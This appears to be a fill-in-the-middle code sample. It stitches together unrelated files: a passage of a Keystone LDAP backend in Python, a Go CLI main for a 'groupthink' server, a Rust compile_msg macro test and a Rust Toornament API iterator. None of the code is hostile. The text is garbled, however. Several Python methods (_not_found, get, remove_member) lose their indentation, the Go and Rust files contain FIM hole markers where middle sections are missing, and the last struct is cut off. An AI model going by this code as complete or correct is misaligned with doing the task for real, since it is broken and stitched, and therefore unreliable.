        self.use_auth_pool = self.use_pool and conf.ldap.use_auth_pool
        self.auth_pool_size = conf.ldap.auth_pool_size
        self.auth_pool_conn_lifetime = conf.ldap.auth_pool_connection_lifetime
        # Per-resource options only apply to concrete subclasses that set
        # options_name (e.g. 'user'); option names are built from that prefix.
        if self.options_name is not None:
            self.suffix = conf.ldap.suffix
            if self.suffix is None:
                self.suffix = self.DEFAULT_SUFFIX
            dn = '%s_tree_dn' % self.options_name
            self.tree_dn = (getattr(conf.ldap, dn)
                            or '%s,%s' % (self.DEFAULT_OU, self.suffix))
            idatt = '%s_id_attribute' % self.options_name
            self.id_attr = getattr(conf.ldap, idatt) or self.DEFAULT_ID_ATTR
            objclass = '%s_objectclass' % self.options_name
            self.object_class = (getattr(conf.ldap, objclass)
                                 or self.DEFAULT_OBJECTCLASS)
            # Map model keys to (possibly overridden) LDAP attribute names.
            for k, v in six.iteritems(self.attribute_options_names):
                v = '%s_%s_attribute' % (self.options_name, v)
                self.attribute_mapping[k] = getattr(conf.ldap, v)
            attr_mapping_opt = ('%s_additional_attribute_mapping' %
                                self.options_name)
            attr_mapping = (getattr(conf.ldap, attr_mapping_opt)
                            or self.DEFAULT_EXTRA_ATTR_MAPPING)
            self.extra_attr_mapping = self._parse_extra_attrs(attr_mapping)
            ldap_filter = '%s_filter' % self.options_name
            self.ldap_filter = getattr(conf.ldap,
                                       ldap_filter) or self.DEFAULT_FILTER
            # Per-resource write permissions.
            allow_create = '%s_allow_create' % self.options_name
            self.allow_create = getattr(conf.ldap, allow_create)
            allow_update = '%s_allow_update' % self.options_name
            self.allow_update = getattr(conf.ldap, allow_update)
            allow_delete = '%s_allow_delete' % self.options_name
            self.allow_delete = getattr(conf.ldap, allow_delete)
            member_attribute = '%s_member_attribute' % self.options_name
            self.member_attribute = getattr(conf.ldap, member_attribute, None)
            self.structural_classes = self.DEFAULT_STRUCTURAL_CLASSES
            if self.notfound_arg is None:
                self.notfound_arg = self.options_name + '_id'
            attribute_ignore = '%s_attribute_ignore' % self.options_name
            self.attribute_ignore = getattr(conf.ldap, attribute_ignore)
            self.use_dumb_member = conf.ldap.use_dumb_member
            self.dumb_member = (conf.ldap.dumb_member or
                                self.DUMB_MEMBER_DN)
            self.subtree_delete_enabled = conf.ldap.allow_subtree_delete
def _not_found(self, object_id):
if self.NotFound is None:
return exception.NotFound(target=object_id)
else:
return self.NotFound(**{self.notfound_arg: object_id})
    def _parse_extra_attrs(self, option_list):
        """Parse '<ldap_attr>:<keystone_attr>' strings into a mapping dict.

        Malformed entries (wrong number of ':' separators, or anything
        else that makes the unpack fail) are logged and skipped rather
        than aborting startup — deliberately best-effort.
        """
        mapping = {}
        for item in option_list:
            try:
                ldap_attr, attr_map = item.split(':')
            except Exception:
                LOG.warn(_LW(
                    'Invalid additional attribute mapping: "%s". '
                    'Format must be <ldap_attribute>:<keystone_attribute>'),
                    item)
                continue
            mapping[ldap_attr] = attr_map
        return mapping
    def _is_dumb_member(self, member_dn):
        """Checks that member is a dumb member.

        :param member_dn: DN of member to be checked.
        :returns: True when dumb members are in use and *member_dn* is the
            configured placeholder entry.
        """
        return (self.use_dumb_member
                and is_dn_equal(member_dn, self.dumb_member))
    def get_connection(self, user=None, password=None, end_user_auth=False):
        """Create a connected (and usually bound) KeystoneLDAPHandler.

        :param user: bind DN; defaults to the configured service user.
        :param password: bind credential; defaults to the configured one.
        :param end_user_auth: True for end-user password checks, which may
            route to the separate auth pool with its own size/lifetime.
        """
        use_pool = self.use_pool
        pool_size = self.pool_size
        pool_conn_lifetime = self.pool_conn_lifetime
        if end_user_auth:
            if not self.use_auth_pool:
                # No dedicated auth pool configured: avoid polluting the
                # shared pool with per-user binds.
                use_pool = False
            else:
                pool_size = self.auth_pool_size
                pool_conn_lifetime = self.auth_pool_conn_lifetime
        conn = _get_connection(self.LDAP_URL, use_pool,
                               use_auth_pool=end_user_auth)
        # Wrap with the UTF-8/logging layer before connecting.
        conn = KeystoneLDAPHandler(conn=conn)
        conn.connect(self.LDAP_URL,
                     page_size=self.page_size,
                     alias_dereferencing=self.alias_dereferencing,
                     use_tls=self.use_tls,
                     tls_cacertfile=self.tls_cacertfile,
                     tls_cacertdir=self.tls_cacertdir,
                     tls_req_cert=self.tls_req_cert,
                     chase_referrals=self.chase_referrals,
                     debug_level=self.debug_level,
                     use_pool=use_pool,
                     pool_size=pool_size,
                     pool_retry_max=self.pool_retry_max,
                     pool_retry_delay=self.pool_retry_delay,
                     pool_conn_timeout=self.pool_conn_timeout,
                     pool_conn_lifetime=pool_conn_lifetime
                     )
        if user is None:
            user = self.LDAP_USER
        if password is None:
            password = self.LDAP_PASSWORD
        # not all LDAP servers require authentication, so we don't bind
        # if we don't have any user/pass
        if user and password:
            conn.simple_bind_s(user, password)
        return conn
    def _id_to_dn_string(self, object_id):
        # Construct the DN mechanically from the configured id attribute and
        # subtree, escaping DN-special characters in the id value.
        return u'%s=%s,%s' % (self.id_attr,
                              ldap.dn.escape_dn_chars(
                                  six.text_type(object_id)),
                              self.tree_dn)
    def _id_to_dn(self, object_id):
        """Resolve an object id to its DN.

        With ONELEVEL scope the DN is fully determined by configuration, so
        it is built directly; otherwise the subtree is searched for the
        entry, falling back to the mechanical DN if nothing matches.
        """
        if self.LDAP_SCOPE == ldap.SCOPE_ONELEVEL:
            return self._id_to_dn_string(object_id)
        with self.get_connection() as conn:
            search_result = conn.search_s(
                self.tree_dn, self.LDAP_SCOPE,
                u'(&(%(id_attr)s=%(id)s)(objectclass=%(objclass)s))' %
                {'id_attr': self.id_attr,
                 'id': ldap.filter.escape_filter_chars(
                     six.text_type(object_id)),
                 'objclass': self.object_class},
                attrlist=DN_ONLY)
        if search_result:
            dn, attrs = search_result[0]
            return dn
        else:
            return self._id_to_dn_string(object_id)
    @staticmethod
    def _dn_to_id(dn):
        # Extract the value of the first RDN, e.g. 'cn=foo,dc=x' -> u'foo'.
        return utf8_decode(ldap.dn.str2dn(utf8_encode(dn))[0][0][1])
    def _ldap_res_to_model(self, res):
        """Convert a raw (dn, attrs) LDAP search result into a model object.

        :param res: a (dn, attribute-dict) tuple as returned by search_s.
        :returns: an instance of self.model populated from the mapped
            attributes (first value of each multi-valued attribute).
        :raises keystone.exception.NotFound: if the id attribute is absent.
        """
        # LDAP attribute names may be returned in a different case than
        # they are defined in the mapping, so we need to check for keys
        # in a case-insensitive way. We use the case specified in the
        # mapping for the model to ensure we have a predictable way of
        # retrieving values later.
        lower_res = {k.lower(): v for k, v in six.iteritems(res[1])}
        id_attrs = lower_res.get(self.id_attr.lower())
        if not id_attrs:
            message = _('ID attribute %(id_attr)s not found in LDAP '
                        'object %(dn)s') % ({'id_attr': self.id_attr,
                                             'dn': res[0]})
            raise exception.NotFound(message=message)
        if len(id_attrs) > 1:
            # FIXME(gyee): if this is a multi-value attribute and it has
            # multiple values, we can't use it as ID. Retain the dn_to_id
            # logic here so it does not potentially break existing
            # deployments. We need to fix our read-write LDAP logic so
            # it does not get the ID from DN.
            message = _LW('ID attribute %(id_attr)s for LDAP object %(dn)s '
                          'has multiple values and therefore cannot be used '
                          'as an ID. Will get the ID from DN instead') % (
                              {'id_attr': self.id_attr,
                               'dn': res[0]})
            LOG.warn(message)
            id_val = self._dn_to_id(res[0])
        else:
            id_val = id_attrs[0]
        obj = self.model(id=id_val)
        for k in obj.known_keys:
            if k in self.attribute_ignore:
                continue
            try:
                map_attr = self.attribute_mapping.get(k, k)
                if map_attr is None:
                    # Ignore attributes that are mapped to None.
                    continue
                v = lower_res[map_attr.lower()]
            except KeyError:
                # Attribute absent on the entry; leave the model key unset.
                pass
            else:
                try:
                    obj[k] = v[0]
                except IndexError:
                    # Attribute present but with an empty value list.
                    obj[k] = None
        return obj
    def check_allow_create(self):
        # Raise ForbiddenAction unless creates are enabled in config.
        if not self.allow_create:
            action = _('LDAP %s create') % self.options_name
            raise exception.ForbiddenAction(action=action)
    def check_allow_update(self):
        # Raise ForbiddenAction unless updates are enabled in config.
        if not self.allow_update:
            action = _('LDAP %s update') % self.options_name
            raise exception.ForbiddenAction(action=action)
    def check_allow_delete(self):
        # Raise ForbiddenAction unless deletes are enabled in config.
        if not self.allow_delete:
            action = _('LDAP %s delete') % self.options_name
            raise exception.ForbiddenAction(action=action)
    def affirm_unique(self, values):
        """Raise Conflict if an entry with the same name or id exists.

        NotFound from the lookups is the success path (EAFP): it means the
        name/id is free.
        """
        if values.get('name') is not None:
            try:
                self.get_by_name(values['name'])
            except exception.NotFound:
                pass
            else:
                raise exception.Conflict(type=self.options_name,
                                         details=_('Duplicate name, %s.') %
                                         values['name'])
        if values.get('id') is not None:
            try:
                self.get(values['id'])
            except exception.NotFound:
                pass
            else:
                raise exception.Conflict(type=self.options_name,
                                         details=_('Duplicate ID, %s.') %
                                         values['id'])
    def create(self, values):
        """Create a new LDAP entry from a model-values dict.

        :param values: dict with at least 'id'; keys are mapped to LDAP
            attributes via attribute_mapping / extra_attr_mapping.
        :returns: the *values* dict unchanged.
        :raises keystone.exception.Conflict: if name or id already exists.
        """
        self.affirm_unique(values)
        object_classes = self.structural_classes + [self.object_class]
        attrs = [('objectClass', object_classes)]
        for k, v in six.iteritems(values):
            if k in self.attribute_ignore:
                continue
            if k == 'id':
                # no need to check if v is None as 'id' will always have
                # a value
                attrs.append((self.id_attr, [v]))
            elif v is not None:
                attr_type = self.attribute_mapping.get(k, k)
                if attr_type is not None:
                    attrs.append((attr_type, [v]))
                # Mirror the value into any extra LDAP attributes mapped to
                # this keystone key.
                extra_attrs = [attr for attr, name
                               in six.iteritems(self.extra_attr_mapping)
                               if name == k]
                for attr in extra_attrs:
                    attrs.append((attr, [v]))
        # groupOfNames requires at least one member; seed with the dumb one.
        if 'groupOfNames' in object_classes and self.use_dumb_member:
            attrs.append(('member', [self.dumb_member]))
        with self.get_connection() as conn:
            conn.add_s(self._id_to_dn(values['id']), attrs)
        return values
    def _ldap_get(self, object_id, ldap_filter=None):
        """Fetch a single raw (dn, attrs) result by id, or None."""
        query = (u'(&(%(id_attr)s=%(id)s)'
                 u'%(filter)s'
                 u'(objectClass=%(object_class)s))'
                 % {'id_attr': self.id_attr,
                    'id': ldap.filter.escape_filter_chars(
                        six.text_type(object_id)),
                    'filter': (ldap_filter or self.ldap_filter or ''),
                    'object_class': self.object_class})
        with self.get_connection() as conn:
            try:
                # Request only the attributes we can map back to the model.
                # NOTE: list-concatenation with dict.values() relies on
                # Python 2 semantics where values() returns a list.
                attrs = list(set(([self.id_attr] +
                                  self.attribute_mapping.values() +
                                  self.extra_attr_mapping.keys())))
                res = conn.search_s(self.tree_dn,
                                    self.LDAP_SCOPE,
                                    query,
                                    attrs)
            except ldap.NO_SUCH_OBJECT:
                # Base DN itself does not exist.
                return None
        try:
            return res[0]
        except IndexError:
            return None
    def _ldap_get_all(self, ldap_filter=None):
        """Fetch all raw (dn, attrs) results for this resource type."""
        query = u'(&%s(objectClass=%s))' % (ldap_filter or
                                            self.ldap_filter or
                                            '', self.object_class)
        with self.get_connection() as conn:
            try:
                # Same mapped-attributes restriction as _ldap_get.
                attrs = list(set(([self.id_attr] +
                                  self.attribute_mapping.values() +
                                  self.extra_attr_mapping.keys())))
                return conn.search_s(self.tree_dn,
                                     self.LDAP_SCOPE,
                                     query,
                                     attrs)
            except ldap.NO_SUCH_OBJECT:
                # Missing base DN is treated as an empty collection.
                return []
    def _ldap_get_list(self, search_base, scope, query_params=None,
                       attrlist=None):
        """Search *search_base* for entries of this object class.

        :param query_params: optional dict of attr -> value equality
            constraints, AND-ed into the filter (values are escaped).
        """
        query = u'(objectClass=%s)' % self.object_class
        if query_params:
            def calc_filter(attrname, value):
                val_esc = ldap.filter.escape_filter_chars(value)
                return '(%s=%s)' % (attrname, val_esc)
            query = (u'(&%s%s)' %
                     (query, ''.join([calc_filter(k, v) for k, v in
                                      six.iteritems(query_params)])))
        with self.get_connection() as conn:
            return conn.search_s(search_base, scope, query, attrlist)
def get(self, object_id, ldap_filter=None):
res = self._ldap_get(object_id, ldap_filter)
if res is None:
raise self._not_found(object_id)
else:
return self._ldap_res_to_model(res)
    def get_by_name(self, name, ldap_filter=None):
        """Fetch one entry by its mapped 'name' attribute.

        Note: *ldap_filter* is accepted for interface symmetry but is not
        applied here; only the name-equality query is used.
        """
        query = (u'(%s=%s)' % (self.attribute_mapping['name'],
                               ldap.filter.escape_filter_chars(
                                   six.text_type(name))))
        res = self.get_all(query)
        try:
            return res[0]
        except IndexError:
            raise self._not_found(name)
    def get_all(self, ldap_filter=None):
        # Fetch every matching entry and convert each to the model type.
        return [self._ldap_res_to_model(x)
                for x in self._ldap_get_all(ldap_filter)]
    def update(self, object_id, values, old_obj=None):
        """Apply *values* to an existing entry via an LDAP modify.

        :param old_obj: current state, fetched if not supplied; used to
            compute a minimal modlist (ADD/REPLACE/DELETE per attribute).
        :returns: the freshly re-read entry as a model object.
        :raises: ForbiddenAction, ValidationError, or NotFound as below.
        """
        if old_obj is None:
            old_obj = self.get(object_id)
        modlist = []
        for k, v in six.iteritems(values):
            if k == 'id':
                # id can't be modified.
                continue
            if k in self.attribute_ignore:
                # Handle 'enabled' specially since can't disable if ignored.
                if k == 'enabled' and (not v):
                    action = _("Disabling an entity where the 'enable' "
                               "attribute is ignored by configuration.")
                    raise exception.ForbiddenAction(action=action)
                continue
            # attribute value has not changed
            if k in old_obj and old_obj[k] == v:
                continue
            if k in self.immutable_attrs:
                msg = (_("Cannot change %(option_name)s %(attr)s") %
                       {'option_name': self.options_name, 'attr': k})
                raise exception.ValidationError(msg)
            if v is None:
                # None means "remove the attribute", but only if it is set.
                if old_obj.get(k) is not None:
                    modlist.append((ldap.MOD_DELETE,
                                    self.attribute_mapping.get(k, k),
                                    None))
                continue
            current_value = old_obj.get(k)
            if current_value is None:
                # Attribute absent: add it.
                op = ldap.MOD_ADD
                modlist.append((op, self.attribute_mapping.get(k, k), [v]))
            elif current_value != v:
                # Attribute present with a different value: replace it.
                op = ldap.MOD_REPLACE
                modlist.append((op, self.attribute_mapping.get(k, k), [v]))
        if modlist:
            with self.get_connection() as conn:
                try:
                    conn.modify_s(self._id_to_dn(object_id), modlist)
                except ldap.NO_SUCH_OBJECT:
                    raise self._not_found(object_id)
        return self.get(object_id)
    def delete(self, object_id):
        """Delete the (leaf) entry for *object_id*.

        :raises: the backend's NotFound exception when the entry is absent.
        """
        with self.get_connection() as conn:
            try:
                conn.delete_s(self._id_to_dn(object_id))
            except ldap.NO_SUCH_OBJECT:
                raise self._not_found(object_id)
    def deleteTree(self, object_id):
        """Delete the entry for *object_id* and its whole subtree.

        Tries the server-side tree-delete control first and falls back to
        deleting entries child-first when the server rejects it.
        """
        tree_delete_control = ldap.controls.LDAPControl(CONTROL_TREEDELETE,
                                                        0,
                                                        None)
        with self.get_connection() as conn:
            try:
                conn.delete_ext_s(self._id_to_dn(object_id),
                                  serverctrls=[tree_delete_control])
            except ldap.NO_SUCH_OBJECT:
                raise self._not_found(object_id)
            except ldap.NOT_ALLOWED_ON_NONLEAF:
                # Most LDAP servers do not support the tree_delete_control.
                # In these servers, the usual idiom is to first perform a
                # search to get the entries to delete, then delete them in
                # in order of child to parent, since LDAP forbids the
                # deletion of a parent entry before deleting the children
                # of that parent. The simplest way to do that is to delete
                # the entries in order of the length of the DN, from longest
                # to shortest DN.
                dn = self._id_to_dn(object_id)
                scope = ldap.SCOPE_SUBTREE
                # With some directory servers, an entry with objectclass
                # ldapsubentry will not be returned unless it is explicitly
                # requested, by specifying the objectclass in the search
                # filter. We must specify this, with objectclass=*, in an
                # LDAP filter OR clause, in order to return all entries
                filt = '(|(objectclass=*)(objectclass=ldapsubentry))'
                # We only need the DNs of the entries. Since no attributes
                # will be returned, we do not have to specify attrsonly=1.
                entries = conn.search_s(dn, scope, filt, attrlist=DN_ONLY)
                if entries:
                    for dn in sorted((e[0] for e in entries),
                                     key=len, reverse=True):
                        conn.delete_s(dn)
                else:
                    LOG.debug('No entries in LDAP subtree %s', dn)
    def add_member(self, member_dn, member_list_dn):
        """Add member to the member list.

        :param member_dn: DN of member to be added.
        :param member_list_dn: DN of group to which the
                               member will be added.

        :raises: exception.Conflict: If the user was already a member.
                 self.NotFound: If the group entry didn't exist.
        """
        with self.get_connection() as conn:
            try:
                mod = (ldap.MOD_ADD, self.member_attribute, member_dn)
                conn.modify_s(member_list_dn, [mod])
            except ldap.TYPE_OR_VALUE_EXISTS:
                raise exception.Conflict(_('Member %(member)s '
                                           'is already a member'
                                           ' of group %(group)s') % {
                                               'member': member_dn,
                                               'group': member_list_dn})
            except ldap.NO_SUCH_OBJECT:
                raise self._not_found(member_list_dn)
def remove_member(self, member_dn, member_list_dn):
"""Remove member from the member list.
:param member_dn: DN of member to be removed.
:param member_list_dn: DN of group from which the
member will be removed.
:raises: self.NotFound: If the group entry didn't exist.
ldap.NO_SUCH_ATTRIBUTE: If the user wasn't a member.
"""
with self.get_connection() as conn:
try:
mod = (ldap.MOD_DELETE, self.member_attribute, member_dn)
conn.modify_s(member_list_dn, [mod])
except ldap.NO_SUCH_OBJECT:
raise self._not_found(member_list_dn)
    def _delete_tree_nodes(self, search_base, scope, query_params=None):
        """Delete all entries of our object class under ``search_base``.

        :param search_base: DN under which to search for entries to delete.
        :param scope: LDAP search scope (e.g. SCOPE_SUBTREE or SCOPE_ONELEVEL).
        :param query_params: optional dict of extra attribute=value terms
            AND-ed into the search filter (values are escaped).

        :raises: self.NotFound: if ``search_base`` itself does not exist.
        """
        query = u'(objectClass=%s)' % self.object_class
        if query_params:
            # AND the extra terms into the objectClass filter; values are
            # escaped to prevent LDAP filter injection.
            query = (u'(&%s%s)' %
                     (query, ''.join(['(%s=%s)'
                                      % (k, ldap.filter.escape_filter_chars(v))
                                      for k, v in
                                      six.iteritems(query_params)])))
        not_deleted_nodes = []
        with self.get_connection() as conn:
            try:
                # We only need the DNs, not the attributes.
                nodes = conn.search_s(search_base, scope, query,
                                      attrlist=DN_ONLY)
            except ldap.NO_SUCH_OBJECT:
                LOG.debug('Could not find entry with dn=%s', search_base)
                raise self._not_found(self._dn_to_id(search_base))
            else:
                for node_dn, _t in nodes:
                    try:
                        conn.delete_s(node_dn)
                    except ldap.NO_SUCH_OBJECT:
                        # Entry vanished between search and delete (e.g.
                        # concurrent deletion); remember it for the warning.
                        not_deleted_nodes.append(node_dn)
        if not_deleted_nodes:
            # Log at most three of the missing DNs to keep the message short.
            LOG.warn(_LW("When deleting entries for %(search_base)s, could not"
                         " delete nonexistent entries %(entries)s%(dots)s"),
                     {'search_base': search_base,
                      'entries': not_deleted_nodes[:3],
                      'dots': '...' if len(not_deleted_nodes) > 3 else ''})
    def filter_query(self, hints, query=None):
        """Applies filtering to a query.

        :param hints: contains the list of filters, which may be None,
                      indicating that there are no filters to be applied.
                      If it's not None, then any filters satisfied here will be
                      removed so that the caller will know if any filters
                      remain to be applied.
        :param query: LDAP query into which to include filters

        :returns query: LDAP query, updated with any filters satisfied
        """
        def build_filter(filter_, hints):
            """Build a filter for the query.

            :param filter_: the dict that describes this filter
            :param hints: contains the list of filters yet to be satisfied.

            :returns query: LDAP query term to be added, or None if this
                filter must be left for the controller to apply.
            """
            ldap_attr = self.attribute_mapping[filter_['name']]
            val_esc = ldap.filter.escape_filter_chars(filter_['value'])

            if filter_['case_sensitive']:
                # NOTE(henry-nash): Although dependent on the schema being
                # used, most LDAP attributes are configured with case
                # insensitive matching rules, so we'll leave this to the
                # controller to filter.
                return

            if filter_['name'] == 'enabled':
                # NOTE(henry-nash): Due to the different options for storing
                # the enabled attribute (e,g, emulated or not), for now we
                # don't try and filter this at the driver level - we simply
                # leave the filter to be handled by the controller. It seems
                # unlikley that this will cause a signifcant performance
                # issue.
                return

            # TODO(henry-nash): Currently there are no booleans (other than
            # 'enabled' that is handled above) on which you can filter. If
            # there were, we would need to add special handling here to
            # convert the booleans values to 'TRUE' and 'FALSE'. To do that
            # we would also need to know which filter keys were actually
            # booleans (this is related to bug #1411478).

            if filter_['comparator'] == 'equals':
                query_term = (u'(%(attr)s=%(val)s)'
                              % {'attr': ldap_attr, 'val': val_esc})
            elif filter_['comparator'] == 'contains':
                query_term = (u'(%(attr)s=*%(val)s*)'
                              % {'attr': ldap_attr, 'val': val_esc})
            elif filter_['comparator'] == 'startswith':
                query_term = (u'(%(attr)s=%(val)s*)'
                              % {'attr': ldap_attr, 'val': val_esc})
            elif filter_['comparator'] == 'endswith':
                query_term = (u'(%(attr)s=*%(val)s)'
                              % {'attr': ldap_attr, 'val': val_esc})
            else:
                # It's a filter we don't understand, so let the caller
                # work out if they need to do something with it.
                return

            return query_term

        if hints is None:
            return query

        filter_list = []
        satisfied_filters = []

        for filter_ in hints.filters:
            # Only attributes we know how to map can be filtered here.
            if filter_['name'] not in self.attribute_mapping:
                continue
            new_filter = build_filter(filter_, hints)
            if new_filter is not None:
                filter_list.append(new_filter)
                satisfied_filters.append(filter_)

        if filter_list:
            # AND the new terms onto the existing query.
            query = u'(&%s%s)' % (query, ''.join(filter_list))

        # Remove satisfied filters, then the caller will know remaining filters
        for filter_ in satisfied_filters:
            hints.filters.remove(filter_)

        return query
class EnabledEmuMixIn(BaseLdap):
    """Emulates boolean 'enabled' attribute if turned on.

    Creates groupOfNames holding all enabled objects of this class, all missing
    objects are considered disabled.

    Options:

    * $name_enabled_emulation - boolean, on/off
    * $name_enabled_emulation_dn - DN of that groupOfNames, default is
      cn=enabled_${name}s,${tree_dn}

    Where ${name}s is the plural of self.options_name ('users' or 'tenants'),
    ${tree_dn} is self.tree_dn.
    """

    def __init__(self, conf):
        super(EnabledEmuMixIn, self).__init__(conf)
        # Read the two per-object-type options from the ldap config section.
        enabled_emulation = '%s_enabled_emulation' % self.options_name
        self.enabled_emulation = getattr(conf.ldap, enabled_emulation)

        enabled_emulation_dn = '%s_enabled_emulation_dn' % self.options_name
        self.enabled_emulation_dn = getattr(conf.ldap, enabled_emulation_dn)
        if not self.enabled_emulation_dn:
            # No DN configured: fall back to cn=enabled_<name>s,<tree_dn>.
            naming_attr_name = 'cn'
            naming_attr_value = 'enabled_%ss' % self.options_name
            sub_vals = (naming_attr_name, naming_attr_value, self.tree_dn)
            self.enabled_emulation_dn = '%s=%s,%s' % sub_vals
            naming_attr = (naming_attr_name, [naming_attr_value])
        else:
            # Extract the attribute name and value from the configured DN.
            naming_dn = ldap.dn.str2dn(utf8_encode(self.enabled_emulation_dn))
            naming_rdn = naming_dn[0][0]
            naming_attr = (utf8_decode(naming_rdn[0]),
                           utf8_decode(naming_rdn[1]))
        # (attr_name, attr_value) used when (re)creating the enabled group.
        self.enabled_emulation_naming_attr = naming_attr

    def _get_enabled(self, object_id):
        # An object is "enabled" iff its DN is a member of the enabled group.
        dn = self._id_to_dn(object_id)
        query = '(member=%s)' % dn
        with self.get_connection() as conn:
            try:
                enabled_value = conn.search_s(self.enabled_emulation_dn,
                                              ldap.SCOPE_BASE,
                                              query, ['cn'])
            except ldap.NO_SUCH_OBJECT:
                # Group missing entirely -> everything is disabled.
                return False
            else:
                return bool(enabled_value)

    def _add_enabled(self, object_id):
        # Add the object's DN to the enabled group, creating the group on
        # first use if it does not exist yet.
        if not self._get_enabled(object_id):
            modlist = [(ldap.MOD_ADD,
                        'member',
                        [self._id_to_dn(object_id)])]
            with self.get_connection() as conn:
                try:
                    conn.modify_s(self.enabled_emulation_dn, modlist)
                except ldap.NO_SUCH_OBJECT:
                    attr_list = [('objectClass', ['groupOfNames']),
                                 ('member', [self._id_to_dn(object_id)]),
                                 self.enabled_emulation_naming_attr]
                    if self.use_dumb_member:
                        attr_list[1][1].append(self.dumb_member)
                    conn.add_s(self.enabled_emulation_dn, attr_list)

    def _remove_enabled(self, object_id):
        # Best-effort removal: missing group or missing membership is fine.
        modlist = [(ldap.MOD_DELETE,
                    'member',
                    [self._id_to_dn(object_id)])]
        with self.get_connection() as conn:
            try:
                conn.modify_s(self.enabled_emulation_dn, modlist)
            except (ldap.NO_SUCH_OBJECT, ldap.NO_SUCH_ATTRIBUTE):
                pass

    def create(self, values):
        if self.enabled_emulation:
            # 'enabled' must not be written as a real attribute; pop it
            # before the underlying create and emulate it afterwards.
            enabled_value = values.pop('enabled', True)
            ref = super(EnabledEmuMixIn, self).create(values)
            if 'enabled' not in self.attribute_ignore:
                if enabled_value:
                    self._add_enabled(ref['id'])
                ref['enabled'] = enabled_value
            return ref
        else:
            return super(EnabledEmuMixIn, self).create(values)

    def get(self, object_id, ldap_filter=None):
        ref = super(EnabledEmuMixIn, self).get(object_id, ldap_filter)
        if 'enabled' not in self.attribute_ignore and self.enabled_emulation:
            ref['enabled'] = self._get_enabled(object_id)
        return ref

    def get_all(self, ldap_filter=None):
        if 'enabled' not in self.attribute_ignore and self.enabled_emulation:
            # had to copy BaseLdap.get_all here to ldap_filter by DN
            tenant_list = [self._ldap_res_to_model(x)
                           for x in self._ldap_get_all(ldap_filter)
                           if x[0] != self.enabled_emulation_dn]
            for tenant_ref in tenant_list:
                tenant_ref['enabled'] = self._get_enabled(tenant_ref['id'])
            return tenant_list
        else:
            return super(EnabledEmuMixIn, self).get_all(ldap_filter)

    def update(self, object_id, values, old_obj=None):
        if 'enabled' not in self.attribute_ignore and self.enabled_emulation:
            # Work on a copy so the caller's dict is not mutated.
            data = values.copy()
            enabled_value = data.pop('enabled', None)
            ref = super(EnabledEmuMixIn, self).update(object_id, data, old_obj)
            if enabled_value is not None:
                if enabled_value:
                    self._add_enabled(object_id)
                else:
                    self._remove_enabled(object_id)
                ref['enabled'] = enabled_value
            return ref
        else:
            return super(EnabledEmuMixIn, self).update(
                object_id, values, old_obj)

    def delete(self, object_id):
        # Drop group membership first so the group holds no dangling DN.
        if self.enabled_emulation:
            self._remove_enabled(object_id)
        super(EnabledEmuMixIn, self).delete(object_id)
class ProjectLdapStructureMixin(object):
    """Project LDAP Structure shared between LDAP backends.

    This is shared between the resource and assignment LDAP backends.
    """
    # NOTE(review): a stray extraction artifact ("<|fim  end|>" token) fused to
    # the last line has been removed; the declarations are otherwise unchanged.
    DEFAULT_OU = 'ou=Groups'
    DEFAULT_STRUCTURAL_CLASSES = []
    DEFAULT_OBJECTCLASS = 'groupOfNames'
    DEFAULT_ID_ATTR = 'cn'
    NotFound = exception.ProjectNotFound
    notfound_arg = 'project_id'  # NOTE(yorik-sar): while options_name = tenant
    options_name = 'project'
    # Mapping of model attribute name -> LDAP attribute option name.
    attribute_options_names = {'name': 'name',
                               'description': 'desc',
                               'enabled': 'enabled',
                               'domain_id': 'domain_id'}
    immutable_attrs = ['name']
<|file_name|>groupthink.go<|end_file_name|><|fim▁begin|>package main
import (
"log"
"os"
"path/filepath"
"github.com/aodin/volta/config"
"github.com/codegangsta/cli"
"github.com/codegangsta/envy/lib"
"github.com/aodin/groupthink/server"
)
func main() {
// Bootstrap the environment
envy.Bootstrap()
app := cli.NewApp()
app.Name = "groupthink"
app.Usage = "Start the groupthink server"
app.Action = startServer
app.Flags = []cli.Flag{
cli.StringFlag{
Name: "log, l",
Value: "",
Usage: "Sets the log output file path",
},
cli.StringFlag{
Name: "config, c",
Value: "./settings.json",
Usage: "Sets the configuration file",
},<|fim▁hole|>func startServer(c *cli.Context) {
logF := c.String("log")
file := c.String("config")
// Set the log output - if no path given, use stdout
// TODO log rotation?
if logF != "" {
if err := os.MkdirAll(filepath.Dir(logF), 0776); err != nil {
log.Panic(err)
}
l, err := os.OpenFile(logF, os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644)
if err != nil {
log.Panic(err)
}
defer l.Close()
log.SetOutput(l)
}
conf := connect(file)
log.Panic(server.New(conf).ListenAndServe())
}
func connect(file string) config.Config {
// Parse the given configuration file
conf, err := config.ParseFile(file)
if err != nil {
log.Panicf("groupthink: could not parse configuration: %s", err)
}
return conf
}<|fim▁end|> | }
app.Run(os.Args)
}
|
<|file_name|>basic.rs<|end_file_name|><|fim▁begin|>#![feature(phase)]
#[phase(plugin)] extern crate compile_msg;<|fim▁hole|>fn main() {
compile_note!("useful information: ", 1, " instance");
compile_warning!("x");
compile_error!("y");
// compilation stops here
compile_fatal!("z");
compile_note!("not emitted")
}<|fim▁end|> |
#[cfg(rare)]
compile_note!("only emitted with --cfg rate")
|
<|file_name|>tournament_matches.rs<|end_file_name|><|fim▁begin|>use crate::*;
use iter::games::GamesIter;
/// A tournament matches iterator
pub struct TournamentMatchesIter<'a> {
client: &'a Toornament,
/// Fetch matches of tournament
tournament_id: TournamentId,
/// Fetch games with the match
with_games: bool,
}
impl<'a> TournamentMatchesIter<'a> {
/// Creates new match iterator
pub fn new(client: &'a Toornament, tournament_id: TournamentId) -> TournamentMatchesIter {
TournamentMatchesIter {
client,
tournament_id,
with_games: false,
}
}
}
/// Builders
impl<'a> TournamentMatchesIter<'a> {
/// Fetch match games
pub fn with_games(mut self, with_games: bool) -> Self {
self.with_games = with_games;
self
}
/// Fetch match by tournament id
pub fn of_tournament(mut self, id: TournamentId) -> Self {
self.tournament_id = id;
self
}
}
/// Modifiers
impl<'a> TournamentMatchesIter<'a> {
/// Get a match with id
pub fn with_id(self, match_id: MatchId) -> TournamentMatchIter<'a> {
TournamentMatchIter {
client: self.client,
tournament_id: self.tournament_id,
match_id,
with_games: self.with_games,
}
}
}
/// Terminators
impl<'a> TournamentMatchesIter<'a> {
/// Fetch matches
pub fn collect<T: From<Matches>>(self) -> Result<T> {
Ok(T::from(self.client.matches(
self.tournament_id,
None,
self.with_games,
)?))
}
}
/// A tournament match iterator
pub struct TournamentMatchIter<'a> {
    client: &'a Toornament,
    /// Fetch match of tournament
    tournament_id: TournamentId,
    /// Fetch match with id
    match_id: MatchId,
    /// Fetch games with the match
    with_games: bool,
}

